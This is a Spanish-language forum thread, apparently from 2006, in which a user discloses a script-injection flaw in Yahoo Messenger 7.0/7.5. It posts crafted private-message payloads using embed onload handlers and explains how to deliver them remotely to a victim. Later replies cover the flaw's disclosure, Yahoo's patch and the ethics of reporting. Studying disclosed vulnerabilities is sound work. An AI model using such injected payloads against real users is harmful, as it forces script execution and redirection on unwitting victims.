Resultados 1 al 16 de 16

Tema: Vulnerabilidad seria en yahoo messenger

  1. #1 Vulnerabilidad seria en yahoo messenger 
    Medio
    Fecha de ingreso
    May 2006
    Mensajes
    51
    Descargas
    0
    Uploads
    0
    Acabo de encontrar otra vulnerabilidad del yahoo messenger. Si ustedes ponen este codigo en un mensaje privado de yahoo messenger www.google.com es abierto por el internet explorer instantaneamente.


    helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(


    Obviamente es posible realizar esta vulnerabilidad en forma remota haciendo que la victima entre a la pagina que nosotros querramos. :-) Después les explico como.
    Testeado en versiones 7.0/7.5
    Citar  
     

  2. #2  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    juas, qué bueno

    ¿La has sacado tú? O la has encontrado por ahí?

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  3. #3  
    Medio
    Fecha de ingreso
    May 2006
    Mensajes
    51
    Descargas
    0
    Uploads
    0
    La encontre yo, en serio tiene un monton de variaciones ya que es posible escribir javascript en un mensaje privado por ejemplo "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=alert('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=alert('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas)Abre una ventana de advertencia con el mensaje Hola ó "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=document.write('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=document.write('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas) Escribe "hola" en la ventana del mensaje privado. Las opciones son infinitas.

    Para hacerlo en forma remota tenemos que enviar un mensaje privado a la victima usando yahelite, enviandolo de la siguiente manera "s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas) "helomsg :" aqui en vez de un espacio insertamos alt+0160 osea "s:[espacio]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
    Saludos.
    Citar  
     

  4. #4  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Enhorabuena! y gracias por el aporte

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  5. #5  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Se lo has dicho a alguien más? Te has puesto ya en contacto con Yahoo?

    Saludos y felicidades.
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  6. #6  
    Medio
    Fecha de ingreso
    May 2006
    Mensajes
    51
    Descargas
    0
    Uploads
    0
    Si, se lo envíe a securityfocus y en el fulldisclosure de insecure http://www.securityfocus.com/bid/19211/ ó http://seclists.org/fulldisclosure/2006/Jul/0673.html yahoo por su parte bloqueó de su página principal la descarga de las versiones anteriores 7.0/7.5. Y reparó el bug en su versión 8.0.
    Saludos
    Citar  
     

  7. #7  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    todo bien, pero no me parece una buena idea hacer el trabajo de otros, y menos si ni siquiera te pagan, reconocen o te dan algun beneficio, sera que yahoo no me cae muy bien. creo que es eso, pero personalmete no me agrada la idea de informar de sus errores a ellos, por algo le pagan a programadores..., no se.
    no creo que sea bienbenida mi idea, pero es lo que me parece
    Saludos
    Cypress
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  8. #8  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Si fuera por esa forma de pensar no existiria el software libre, ¿no crees?
    Citar  
     

  9. #9  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    software libre es diferente a yahoo. de MICROSOFT
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  10. #10  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Cuando hablamos de libertad de conocimientos no nos estamos refiriendo a que se comparta la manera en que se explota un fallo sin publicar este fallo, ya sea yajú o gmail o lo que sea, hablamos de enseñar, publicar el código responsable de comportamiento de nuestras máquinas.

    cypress, así es como se colabora realmente, como acaba de hacer Tcp_syn, no atacando sin sentido a corporaciones que nos caen mal, ¿nunca has pensado que quizá con tus campañas de supuesta concienciación est.ás alimentando al troll? O sea, ¿no crees que puedes ser tú quien hace publicidad gratuita a estas empresas que nada aportan al conocimiento en el terronode la informática?

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  11. #11  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Además, esto es hacer trolling en un hilo dedicado a vulnerabilidades y ubicado en la sección correcta, tus opiniones y puntos de vista personales deberán ir en off-topic

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  12. #12  
    Medio
    Fecha de ingreso
    May 2006
    Mensajes
    51
    Descargas
    0
    Uploads
    0
    Cuando se descubrió la vulnerabilidad wmf los "programadores" de microsoft tardaron mas de 2 semanas en publicar el parche mientras que en otras páginas en muy poco tiempo publicaron parches no oficiales. La intencion de revelar un exploit es para que miles de entendidos en el tema puedan ayudar a la reparacion del mismo sin fines de lucro. Además a los "programadores" de microsoft les pagan de 100u$s a 500u$s por descubrir cada vulnerabilidad. ...si se publicara el codigo fuente de windows quiza le podamos dar una mano a microsoft...
    Citar  
     

  13. #13  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    tengo que admitir cuando me he equivocado...
    tienen razon.
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  14. #14  
    Moderador HH
    Fecha de ingreso
    Sep 2004
    Ubicación
    AR
    Mensajes
    867
    Descargas
    2
    Uploads
    0
    TCP_SYN, no quiero desconfiar de ti, pero mira esto:
    http://seclists.org/fulldisclosure/2006/Jul/0673.html
    Excepto que te llames Ivan...fue otro el que lo descubrió
    La inspiracion es una impredecible puta. Usualmente ella me besa cuando nadie mas quiere hacerlo.
    Citar  
     

  15. #15  
    Medio
    Fecha de ingreso
    May 2006
    Mensajes
    51
    Descargas
    0
    Uploads
    0
    Si me llamo Iván enviame un mail si querés y te lo demuestro. :-)
    Citar  
     

  16. #16  
    Moderador HH
    Fecha de ingreso
    Sep 2004
    Ubicación
    AR
    Mensajes
    867
    Descargas
    2
    Uploads
    0
    Felicitaciones Ivan!!
    Un orgullo tu descubrimiento.

    salu2
    La inspiracion es una impredecible puta. Usualmente ella me besa cuando nadie mas quiere hacerlo.
    Citar  
     

Temas similares

  1. Yahoo Messenger 7.0 crash
    Por Tcp_syn en el foro VULNERABILIDADES
    Respuestas: 1
    Último mensaje: 14-01-2011, 02:49
  2. Yahoo! Messenger, desbordamiento en YVerInfo.dll
    Por ABODUJANA en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 02-09-2007, 18:19
  3. como instalo yahoo messenger en linux
    Por chico1988 en el foro LINUX - MAC - OTROS
    Respuestas: 21
    Último mensaje: 01-06-2007, 03:02
  4. Hackear una webcam en msn o yahoo messenger
    Por pancas en el foro VULNERABILIDADES
    Respuestas: 1
    Último mensaje: 26-06-2006, 10:52
  5. Kazaa registra una seria vulnerabilidad
    Por aerial25 en el foro NOTICIAS
    Respuestas: 0
    Último mensaje: 28-05-2003, 16:24

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •